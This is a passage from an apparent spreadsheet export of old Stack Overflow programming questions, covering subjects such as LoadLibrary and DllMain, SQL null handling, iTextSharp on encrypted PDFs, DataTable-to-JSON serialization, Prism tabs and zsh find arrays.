&lt;p&gt;I'm using a console app without message loop; this app loads an exe with the LoadLibrary function, so that it can use its exported functions. Bad news: the DllMain function of the exe is not called (and I verified the symbols tables, using a def file, DllMain appears correctly); &lt;a href="http://msdn.microsoft.com/en-us/library/ms682583.aspx" rel="nofollow"&gt;the doc says&lt;/a&gt; it's called if the loaded module is a DLL (too bad).&lt;/p&gt;
&lt;p&gt;What are the conditions (if they exist) which could lead to the execution of the exe's DllMain function when LoadLibrary is called (and maybe again when FreeLibrary is called)?&lt;/p&gt;
&lt;p&gt;Best regards&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP Get Source and Search for Word</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need help i want to code a program that search for a word inside the source code. &lt;/p&gt;
&lt;p&gt;Here a Example in Python: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import urllib2, re
site = "http://stackoverflow.com/"
tosearch = "Questions"
source = urllib2.urlopen(site).read()
if re.search(tosearch,source):
     print "Found The Word", tosearch
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C#: Generic sorted container that can return the sorted position of a newly added object?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a generic container that keeps its elements sorted and can be asked where (at which position) it would insert a new element, without actually inserting it.&lt;/p&gt;
&lt;p&gt;Does such a container exist in the .NET libraries?
The best illustration is an example (container sorts characters by ASCII value, let's assume unicode does not exist):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sortedContainer.Add('d');
sortedContainer.Add('b');
sortedContainer.Add('g');
//container contains elements ordered like 'b' 'd' 'g'
//index  --------------------------------&amp;gt;  0   1   2
sortedContainer.GetSortedIndex('a'); //returns 0
sortedContainer.GetSortedIndex('b'); //returns 0
sortedContainer.GetSortedIndex('c'); //returns 1
sortedContainer.GetSortedIndex('d'); //returns 1
sortedContainer.GetSortedIndex('e'); //returns 2
sortedContainer.GetSortedIndex('f'); //returns 2
sortedContainer.GetSortedIndex('g'); //returns 2
sortedContainer.GetSortedIndex('h'); //returns 3
[...]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The search for the position should take advantage of the fact that the elements are sorted.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Going beyond the iframe</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hey! 
I am trying to get an iframe B communicate with site A.
I've searched and searched and every thing I read says it's impossible if they are of different domain (the iframe src is coming from a sub domain).&lt;/p&gt;
&lt;p&gt;I want to communicate because my company has ads on its page and it needs to refresh them every X minutes. This is ok if it's a normal add, but some adds extend. Like I have adds that start with 300x250 and then get to 800x300. 
I wanted to communicate to the iframe to know when the add was going to expand but it just doesn't seem to be a way. Is there any way to let the add go beyond the initial size of the iframe? &lt;/p&gt;
&lt;p&gt;If the add is 300x250 the iframe will also have 300x250, but when the add expands it get's cut off, so I really need to either get the iframe to expand also or have the add go beyond the size of the iframe.&lt;/p&gt;
&lt;p&gt;Anyone know how to do this or have some tutorial that shows how to have some basic communication to an iframe.&lt;/p&gt;
&lt;p&gt;Note: There are some websites that also serve adds that have a totally different domain, so it would be great if someone knew how to make it go beyond the iframe.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL nvl equivalent - without if/case statements &amp; isnull &amp; coalesce</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any nvl() equivalent functions in SQL?&lt;/p&gt;
&lt;p&gt;Or something close enough to be used in the same way in certain scenarios?&lt;/p&gt;
&lt;p&gt;&lt;hr&gt;
UPDATE:
&lt;br&gt;no if statements&lt;br&gt;no case statements&lt;br&gt;no isnull&lt;br&gt;no coalesce&lt;hr&gt;&lt;br&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select nvl (purge_date,"SODIUFOSDIUFSDOIFUDSF") from id_rec where id=36581;
(expression)
SODIUFOSDIUFSDOIFUDSF
1 row(s) retrieved.
select isnull (purge_date,"SODIUFOSDIUFSDOIFUDSF") from id_rec where id=36581;
  674: Routine (isnull) can not be resolved.
Error in line 1
Near character position 8
select coalesce (purge_date,"SODIUFOSDIUFSDOIFUDSF") from id_rec where id=36581;
  674: Routine (coalesce) can not be resolved.
Error in line 1
Near character position 8
select decode(purge_date, NULL, "01/01/2009", purge_date) from id_rec where id=74115;
  800: Corresponding types must be compatible in CASE expression.
Error in line 1
Near character position 57
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Can I fill in an encypted PDF with iTextSharp?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a fillable, saveable PDF file that has an owner password (that I don't have access to). I can fill it out in Adobe reader, export the FDF file, modify the FDF file, and then import it. &lt;/p&gt;
&lt;p&gt;Then I tried to do it with iText(Sharp). I can't create a PdfStamper from my PdfReader because I didn't provide the owner password to the reader. Is there any way to do this programmatically or must I recreate the document? Even using FdfReader requires a PdfStamper. Am I missing anything? Anything legal that is - I'm pretty sure I could hack the document, but I can't. Ironically, recreating it would probably be ok. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to do effective paging in Classic ASP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to page a table, and while I have paging already working, it displays every page in a single line along with Previous/Next links, causing the HTML page to break if there are a lot of results (which often there are).&lt;/p&gt;
&lt;p&gt;What I'd like to do is display the pages in batches of 10, e.g. 1...10, if you're on page 10 and click "Next" then it changes to 11-20, and so on.  How should I go about doing this?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>AS3 - How to do a synchronous load of an asynchronous call?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a function that loads a user object from a web service asynchronously.&lt;/p&gt;
&lt;p&gt;I wrap this function call in another function and make it synchronous.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    private function getUser():User{
            var newUser:User;
            var f:UserFactory = new UserFactory();
            f.GetCurrent(function(u:User):void{
                newUser = u;
            });
            return newUser;
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;UserFactory.GetCurrent looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public function GetCurrent(callback:Function):void{ }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But my understanding is there is no guarantee that when this function gets called, newUser will actually be the new user??&lt;/p&gt;
&lt;p&gt;How do you accomplish this type of return function in Flex?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The diff between openssl-2 and openssl-3</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;New to this. &lt;/p&gt;
&lt;p&gt;How can you tell what the openssl version is and what's the diff?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any free tools for webservice testing with NTLM2 support?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tools are free tools are available for testing WebServices that are behind NTLM2 authentication.&lt;/p&gt;
&lt;p&gt;SoapUI Is Excellent tool with all functionality that I need, however, it doesn't support NTLMv2. If someone has a way of making that work, please provide solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I configure authentication between linked servers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to test a proof of concept that I can run a distributed transaction across two linked SQL Servers, linked using sp_addlinkedserver - their names are Server1 and Server2, both running under default instances.  Each server holds a single database, Source and Destination respectively and the destination database holds a single table called Output, i.e.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Server1.Source
Server2.Destination.Output
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The OUTPUT table has the following structure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;OUT_PKEY int identity(1,1) primary key,
OUT_TEXT nvarchar(255)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;From Server1 I have called *sp_addlinkedserver 'Server2'* to link the two databases and I've attempted to run the following query to test that the link does indeed work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Select   *
From     Server2.Destination.dbo.Output
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am returned the following exception:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Access to the remote server is denied because no login-mapping exists.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Fair enough, so from Server1, I run *sp_addlinkedsrvlogin 'Server2'* which according to the documentation says that it should take the user credentials of whomever runs the query remotely (i.e. from Server1) and apply those credentials to Server2.  This implies that since I am connected to Server1 using Windows Authentication, this should mean that my Windows Credentials are applied to Server2 also.&lt;/p&gt;
&lt;p&gt;Now the exception message changes to:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Login failed for user 'NT AUTHORITY\ANONYMOUS LOGON'.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Having Googled this exception, I came up with nothing useful that pointed me in the right direction.  What am I missing?  I would expect [should the login fail at all] the exception to reference &lt;em&gt;my&lt;/em&gt; Windows Credentials, &lt;em&gt;not&lt;/em&gt; the anonymous logon credentials.&lt;/p&gt;
&lt;p&gt;It looks like once I get the link itself working, the distributed transactions themselves should be a fairly simple affair - the documentation implies that I just need to ensure that the DTC Service is running on Server1 and that any queries run on Server1 that will be transacted across the link:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Include *SET XACT_ABORT ON* prior to initializing my distributed transaction&lt;/li&gt;
&lt;li&gt;I use &lt;em&gt;BEGIN DISTRIBUTED TRANSACTION&lt;/em&gt; instead of &lt;em&gt;BEGIN TRANSACTION&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;If I wish to reference a non-default instance of SQL Server on Server2, I replace any instances of the name &lt;em&gt;Server2&lt;/em&gt; in my query with &lt;em&gt;[Server2\InstanceName]&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;My questions are these:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;how do I get past this login issue?  The *sp_addlinkedsrvlogin* stored procedure alone doesn't seem to be doing the trick.&lt;/li&gt;
&lt;li&gt;Is it indeed as simple as that to run the distributed transaction as the documentation implies?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;TIA&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MVC frameworks for .NET desktop applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been playing a lot with MVC lately in the forms of ASP.NET MVC and Django (MTV actually) and I must say that I love it.&lt;/p&gt;
&lt;p&gt;Are there any similar frameworks for creating desktop WinForm apps?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SaveFileDialog blocking removeable drive</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a SaveFileDialog to let a user pick a directory and filename on a removeable drive.
Afterwards I create that file, write to it, and close it again.&lt;/p&gt;
&lt;p&gt;By then the file itself is not locked (editable, deleteable), but I can't eject the drive because windows claims it is still in use. I have to exit the application before an eject is possible.&lt;/p&gt;
&lt;p&gt;Incidentally the drive gets locked even when I only pick the file with the SaveFileDialog. Hitting "Cancel" on the dialog doesn't cause the problem&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SaveFileDialog dlg = new SaveFileDialog();
dlg.DefaultExt = ".csv";
dlg.InitialDirectory = mySettings.defaultPath;
dlg.Filter = "(CSV-Dateien) *.csv|";
dlg.FileName = exportDate.ToString("yyyy-MM-dd") + ".csv";
if (dlg.ShowDialog() != DialogResult.OK){
    // USB-Drive is ejectable
}else{
    // USB-Drive is locked
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is there an idiomatic way to listen for changes to the DOM using the Prototype library?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to add a listener to DOM change events. I was hoping something as simple as 'dom:loaded' was baked into Prototype. I'm not sure of the 'Prototype-way' to handle this.&lt;/p&gt;
&lt;p&gt;EDIT: I cannot control every case in which the DOM may be altered, so I can't get away with firing a custom event on every DOM change.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Expose a specific .net object as JSON</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently enabling JSON calls to my web services using the ScriptService attribute.  The problem is that one of my classes references a second class and .Net is not picking up and writing out the JavaScript for the second class.  &lt;/p&gt;
&lt;p&gt;As a workaround I can write a dummy method that just returns the second class.  Then .Net writes the JSON to allow it to be serialized.  So in the following example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[ScriptService]
public class MyService : WebService {
    [WebMethod]
    public void SaveClass1(Class1 class1) {
        ...
    }
}
[Serializable]
public class Class1 {
    public Class2 class2 { get; set; }
}
[Serializable]
public class Class2 {
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;MyService.asmx/js won't write code to allow me to instantiate Class2 in order for me to populate Class1.  But I can make it work if I add:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[WebMethod]
public Class2 Dummy() {
    return new Class2();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to MyService.  Any alternatives to my nasty workaround would be greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DataTable to JSON</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently needed to serialize a datatable to JSON.  Where I'm at we're still on .Net 2.0, so I can't use the JSON serializer in .Net 3.5.  I figured this must have been done before, so I went looking online and &lt;a href="http://www.codeproject.com/KB/aspnet/ASPNET_DataTable_to_JSON.aspx" rel="nofollow"&gt;found&lt;/a&gt; a &lt;a href="http://www.dennydotnet.com/post/A-DataTable-Serializer-for-ASPNET-AJAX.aspx" rel="nofollow"&gt;number&lt;/a&gt; of &lt;a href="http://schotime.net/blog/index.php/2008/07/27/dataset-datatable-to-json/" rel="nofollow"&gt;different&lt;/a&gt; &lt;a href="http://geekswithblogs.net/shahed/archive/2008/03/22/120709.aspx" rel="nofollow"&gt;options&lt;/a&gt;.  Some of them depend on an additional library, which I would have a hard time pushing through here.  Others require first converting to &lt;code&gt;List&amp;lt;Dictionary&amp;lt;&amp;gt;&amp;gt;&lt;/code&gt;, which seemed a little awkward and needless.  Another treated all values like a string.  For one reason or another I couldn't really get behind any of them, so I decided to roll my own, which is posted below.  &lt;/p&gt;
&lt;p&gt;As you can see from reading the &lt;code&gt;//TODO&lt;/code&gt; comments, it's incomplete in a few places.  This code is already in production here, so it does "work" in the basic sense.  The places where it's incomplete are places where we know our production data won't currently hit it (no timespans or byte arrays in the db).  The reason I'm posting here is that I feel like this can be a little better, and I'd like help finishing and improving this code.  Any input welcome.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Note that this capability is built into .Net 3.5 and later, and so the only reason to use this code today is if you're still limited to .Net 2.0. Even then, JSON.Net has become the goto library for this kind of thing.&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static class JSONHelper
{
    public static string FromDataTable(DataTable dt)
    {
        string rowDelimiter = "";
        StringBuilder result = new StringBuilder("[");
        foreach (DataRow row in dt.Rows)
        {
            result.Append(rowDelimiter);
            result.Append(FromDataRow(row));
            rowDelimiter = ",";
        }
        result.Append("]");
        return result.ToString();
    }
    public static string FromDataRow(DataRow row)
    {
        DataColumnCollection cols = row.Table.Columns;
        string colDelimiter = "";
        StringBuilder result = new StringBuilder("{");       
        for (int i = 0; i &amp;lt; cols.Count; i++)
        { // use index rather than foreach, so we can use the index for both the row and cols collection
            result.Append(colDelimiter).Append("\"")
                  .Append(cols[i].ColumnName).Append("\":")
                  .Append(JSONValueFromDataRowObject(row[i], cols[i].DataType));
            colDelimiter = ",";
        }
        result.Append("}");
        return result.ToString();
    }
    // possible types:
    // http://msdn.microsoft.com/en-us/library/system.data.datacolumn.datatype(VS.80).aspx
    private static Type[] numeric = new Type[] {typeof(byte), typeof(decimal), typeof(double), 
                                     typeof(Int16), typeof(Int32), typeof(SByte), typeof(Single),
                                     typeof(UInt16), typeof(UInt32), typeof(UInt64)};
    // I don't want to rebuild this value for every date cell in the table
    private static long EpochTicks = new DateTime(1970, 1, 1).Ticks;
    private static string JSONValueFromDataRowObject(object value, Type DataType)
    {
        // null
        if (value == DBNull.Value) return "null";
        // numeric
        if (Array.IndexOf(numeric, DataType) &amp;gt; -1)
            return value.ToString(); // TODO: eventually want to use a stricter format. Specifically: separate integral types from floating types and use the "R" (round-trip) format specifier
        // boolean
        if (DataType == typeof(bool))
            return ((bool)value) ? "true" : "false";
        // date -- see http://weblogs.asp.net/bleroy/archive/2008/01/18/dates-and-json.aspx
        if (DataType == typeof(DateTime))       
            return "\"\\/Date(" + new TimeSpan(((DateTime)value).ToUniversalTime().Ticks - EpochTicks).TotalMilliseconds.ToString() + ")\\/\"";
        // TODO: add Timespan support
        // TODO: add Byte[] support
        //TODO: this would be _much_ faster with a state machine
        //TODO: way to select between double or single quote literal encoding
        //TODO: account for database strings that may have single \r or \n line breaks
        // string/char  
        return "\"" + value.ToString().Replace(@"\", @"\\").Replace(Environment.NewLine, @"\n").Replace("\"", @"\""") + "\"";
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;br&gt;
This is old now, but I wanted to point out something about how this code handles dates. The format I used made sense at the time, for the exact rationale in the url. However, that rationale includes the following:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;To be perfectly honest, JSON Schema does solve the problem by making it possible to "subtype" a string as a date literal, but this is still work in progress and it will take time before any significant adoption is reached.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Well, time has passed. Today, it's okay to just use the &lt;a href="http://en.wikipedia.org/wiki/ISO_8601" rel="nofollow"&gt;ISO 8601&lt;/a&gt; date format. I'm not gonna bother changing the code, 'cause really: this is ancient. Just go use JSON.Net.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can i determine which of my product's .net assemblies are registered, when i have several on my pc?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the code for various versions of a software product I work on on my machine. The product includes one or more assemblies that are registered for com interop. How can I determine which one is currently registered?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I know what encoding scheme to use when converting a string to a byte array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From my database I am getting a very long string which is basically xml.
I need to change it to a byte array.&lt;/p&gt;
&lt;p&gt;I can't get my head around the potential encoding issues.&lt;/p&gt;
&lt;p&gt;What do I need to be careful of when doing this conversion?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; public static byte[] StringToByteArray1(string str)
    {
        return Encoding.ASCII.GetBytes(str);
    }
    public static byte[] StringToByteArray2(string str)
    {
        return Encoding.UTF8.GetBytes(str);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Encoding.ASCII.GetBytes vs Encoding.UTF8.GetBytes&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the most efficient way to access sibling dictionary value in a Python dict?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Python, I've got a list of dictionaries that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;matchings = [
    {'id': 'someid1', 'domain': 'somedomain1.com'},
    {'id': 'someid2', 'domain': 'somedomain2.com'},
    {'id': 'someid3', 'domain': 'somedomain3.com'}
]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and, I have a variable:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;the_id = 'someid3'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What's the most efficient way to retrieve the domain value of the item?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>No Process Is on the Other End of the Pipe</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I receive this error when I try to connect to SQL Server 2005. I have enabled TCP/IP, Named Pipes, and restarted the server but that is not working.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Same module multiple times as TabItems</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's my scenario:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Shell with 1 TabControl and 1 region called MenuRegion&lt;/li&gt;
&lt;li&gt;MenuRegion contains Buttons for each of the available modules (applications).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I want to achieve the following using Prism (Composite Application Library for WPF): When one of the buttons is clicked, I need to add a new TabItem to the TabControl, and load and individual instance of the corresponding module (application) inside this TabItem.
One module may appear several times in the TabControl.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I really appreciate your answer. But I don't believe you're using Prism (&lt;a href="http://www.codeplex.com/CompositeWPF" rel="nofollow"&gt;http://www.codeplex.com/CompositeWPF&lt;/a&gt;) are you? My question was more related to Prism, and I've edited it to be more clear now.&lt;/p&gt;
&lt;p&gt;In Prism you dynamically load modules' views into regions. I am not sure how to do that in my scenario because the regions are to be set dynamically. How would I name them? &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Determine if flash OCX is installed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to determine if the flash ocx is installed in Innosetup (or any installer for that matter).  I don't want to attempt to install it myself, I will simply force the user to go to the flash site and install, I just want to make sure that the flash.ocx (version 9+) is installed.&lt;/p&gt;
&lt;p&gt;Is it enough to check for HKEY_CLASSES_ROOT\ShockwaveFlash.ShockwaveFlash and check that CurVer &gt;= 9?  Is there a better way to test for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I efficiently transform a series of strings in powershell?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose I have a large number of strings formatted something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;tag&amp;gt;blah blahXXXXXblah blah&amp;lt;/tag&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to transform these strings into something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;blah blahZZZZZblah blah
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;on a powershell command line.  All instances of XXXXX get replaced by ZZZZZ in the transformation and the outer tags are stripped out.  It isn't well-formed XML.&lt;/p&gt;
&lt;p&gt;I can write a script that would evaluate this easily enough, I believe, but when dealing with this particular bit of software I find myself performing tasks like this more often than I'd like.  I'm interested in learning how to do this straight from the powershell command line without the additional step of writing a .ps1 script to run.&lt;/p&gt;
&lt;p&gt;It seems like something powershell would be good at, I just don't know how.  :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get the XPath to an XElement?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got an XElement deep within a document. Given the XElement (and XDocument?), is there an extension method to get its full (i.e. absolute, e.g. &lt;code&gt;/root/item/element/child&lt;/code&gt;) XPath?&lt;/p&gt;
&lt;p&gt;E.g. myXElement.GetXPath()?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:
Okay, looks like I overlooked something very important. Whoops! The index of the element needs to be taken into account. See my last answer for the proposed corrected solution.&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which versions of SQL Server does LINQ to SQL support?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can SQL Server 2000 be used as the database for LINQ to SQL?&lt;/p&gt;
&lt;p&gt;Does LINQ to SQL rely on a specific version of Microsoft SQL Server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I programmatically set the object type for a DirectCast command?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm helping a colleague develop a "catch all" type error handler for some controls his application. What he wants to do is pass the object that has the error, and the type of that object, such a TextBox or ComboBox, and then call the DirectCast method within his handler to properly address the Text attribute within it. In general, the method is looking like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Protected Sub SpecialErrorHandler(ByVal TargetControl As Object, ByVal ControlType As String)
   MessageBox.Show("Bad Juice: " &amp;amp; DirectCast(TargetControl, ControlType(ObjType)).Text)
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So far any attempts to do a type conversion within the DirectCast method (since it is expecting an object in the general signature) or to even pass in the a Type object properly set is not working.&lt;/p&gt;
&lt;p&gt;Any ideas here, or is this one of those "Casting doesn't work that way." type scenarios?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make a universal type conversion method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What I want to do is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bool Convert( out Object output, Object source)
{
   // find type of output.
   // convert source to that type if possible
   // store result in output.
   return success
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is it possible? &lt;/p&gt;
&lt;p&gt;Obviously, there is a brute force massive "if" construct that could work, but that would require writing an if block for every conceivable data type.  Even assuming we'll limit it to primitives and strings, it's still a huge chunk of code. I'm thinking about something a bit more reflective.&lt;/p&gt;
&lt;p&gt;Aside: While going through the api, I came across the Convert.IsDBNull() method, which will save me a lot of &lt;/p&gt;
&lt;pre&gt;&lt;code&gt; if ( !databasefield.GetType().Equals( DBNull.Value ) )
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why in the name of G-d is it in Convert?  Why not DBNull.IsDBNull() ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I use a pre-defined CSS style for a programmatically drawn TextField?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a graphical application that renders text to BitmapData - right now it's hardcoded to use a specific font, and that's fine for testing, but for production I really need it to be style-able.&lt;/p&gt;
&lt;p&gt;The rest of the application uses specific fonts, and I want to be able to just use a stylename (the style of the font) to create a TextFormat object to pass to the text sprites embedded TextField object..&lt;/p&gt;
&lt;p&gt;So here's the sequence now, roughly:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    	var format:TextFormat = new TextFormat();
		format.font = "Arial";
		format.color = 0xFF0000;
		format.size = 12;
		// tf is a previously instantiated TextField()
		tf.defaultTextFormat = format;
		tf.autoSize = TextFieldAutoSize.LEFT;
		tf.text = _text;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then later, it's simply drawn with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    	bmpData.fillRect(srcRect,0x00000000);
		bmpData.draw(tf);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now this is nasty, so how do I get a StyleSheet or TextFormat from my apps css definitions? I've looked in the StyleManager, the CSSStyleDeclaration, nothing seems to quite fit. What's the sequence here, anyone?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Trying to build an SQL statement for complex search scenario</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to build an SQL Statement for the following search scenario:&lt;/p&gt;
&lt;p&gt;I have trying to return all of the columns for an individual record for Table A based on the value of the status column in Table B.  Each record in table A can have multiple rows in table B, making it a one to many relationship.  The status column is nullable with a data type of integer.&lt;/p&gt;
&lt;p&gt;Here are the possible values for status in table B:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;NULL = Pending,&lt;/li&gt;
&lt;li&gt;1 = Approved,&lt;/li&gt;
&lt;li&gt;2 = Denied,&lt;/li&gt;
&lt;li&gt;6 = Forced Approval,&lt;/li&gt;
&lt;li&gt;7 = Forced Denial&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The end user can search on the following scenarios:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Approved - All table B records must have a value of 1 or 6 for status.&lt;/li&gt;
&lt;li&gt;Denied - One table B record must have a value of 2 or 5.  Any other records can have 1,6, or null.&lt;/li&gt;
&lt;li&gt;Pending - All table B records can have a value of 1,6 or null.  One record must be null because it is not considered completed.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;b&gt;UPDATE&lt;/b&gt;&lt;br /&gt;
I consulted with one of our DBAs and he developed the following solution:&lt;/p&gt;
&lt;p&gt;Approved:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT a.* FROM TableA a INNER JOIN TableB ON b.id = a.id
WHERE
(b.status in (1,6) and b.status IS NOT NULL) AND
b.id NOT IN (SELECT id from TableB  WHERE status IS NULL)
AND b.id NOT IN (SELECT id from TableB WHERE status in (2,7))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Denied:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT a.* FROM TableA a INNER JOIN TableB ON b.id = a.id
WHERE
(b.status in (2,7))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Pending:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT a.* FROM TableA a INNER JOIN TableB ON b.id = a.id
WHERE
(b.status IN (1,6) OR b.status IS NULL)
AND b.id NOT IN (SELECT b.id FROM TableA a INNER JOIN TableB b ON b.id = a.id WHERE (b.status IN (1,6) AND b.status IS NOT NULL) AND b.id NOT IN (SELECT id from TableB WHERE status IS NULL))
AND b.id NOT IN (SELECT id FROM TableB WHERE status IN (2,7))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;b&gt;UPDATE 2:&lt;/b&gt;&lt;br /&gt;
@Micth Wheat - How would I refactor the following solution using the EXIST/NOT EXIST t-sql keyword?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to split on NULs in shell</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using zsh as a shell.&lt;/p&gt;
&lt;p&gt;I would like to execute the unix find command and put the result into a shell array variable, something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FILES=($(find . -name '*.bak'))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so that I can iterate over the values with something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for F in "$FILES[@]"; do echo "&amp;lt;&amp;lt;$F&amp;gt;&amp;gt;"; done
&lt;/code&gt;&lt;/pre&gt;
